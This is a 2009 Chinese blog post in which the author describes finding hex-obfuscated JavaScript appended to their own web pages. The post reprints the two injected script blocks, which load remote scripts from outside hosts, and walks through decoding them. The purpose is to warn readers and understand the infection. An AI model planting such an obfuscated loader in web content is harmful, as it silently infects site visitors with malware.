记忆盒子

把记忆装进灰色的盒子,封装起来,那年那月,重新拾起。

首页搜索目录
search
当前主题: 软件编程

文件尾竟被加入病毒\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】

作者:Kaka    时间:2009-12-9 12:33:40    浏览:    评论:9

      今天打开一个自己的网页,竟发现了文件尾巴病毒源,真是可恶,空间商没做好杀毒防毒啊。

      病毒源如下:

 <script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>

      这是一段通过16进制编码的script病毒,当你打开含有这段代码的页面时,那你的电脑立马中毒,好狠啊!

      可以通过alert来解密,例如把上面粗体字代码解密:

<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>

      解密结果是:

      同样的,把后面各个中括号里的代码段alert,结果这个病毒源代码就出来了。上面的病毒源代码解密结果是:

document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");

       很明显,这是在你电脑执行一段javascript挂马程序,一旦你打开含有这段代码的页面,你的电脑就立即中招了。

      这些病毒我暂时没找到专杀软件,例如你有上千个页面都中毒了,那是不能手动一个一个清除的了。一旦我找到专杀软件,会第一时间来博客共享。有网友发现专杀软件了吗?

Tags: Program  

加入本站QQ群(312716741),交流分享网站建设、优化、SEO技术。。。

 

上一篇: AMAZING! 卡卡网主站一个点击价格竟超过博客50个点击!
下一篇: 在GoDaddy安装Z-Blog不成功
  • 8.muxiaku
  • http://www.muxiaku.cn
  • 遇到那些也是很难得的,分析分析,也许可以分析出个oady来,那个值钱有用了.
    Liwen 于 2009-12-12 5:05:40 回复
    别说难遇到,我宁愿永远都不遇到呢!Hehe
  • 2009-12-12 4:21:18 回复该留言
  • 2.九站
  • http://blog.mynine.cn
  • 你的网页上?怎么可能上传到你的网页呢?我下载下来那JS看看到底有咋了不起的。
    Liwen 于 2009-12-9 17:21:42 回复
    空间商没防好毒啊Sad
  • 2009-12-9 15:07:43 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅博客                   QQ交流群(312716741)

  • 通过Google订阅本站 通过鲜果订阅本站 通过抓虾订阅本站
  • 通过QQ邮箱订阅本站 通过Yahoo订阅本站 通过有道订阅本站

Search

最新评论及回复

最近留言

网站分类

Powered By Z-Blog 1.8 Walle Build 91204 Designed by Han'space

Copyright @2009 All Rights Reserved. 粤ICP备09073737号

Powered By Z-Blog 1.8 Walle Build 91204
Copyright @2009 All Rights Reserved.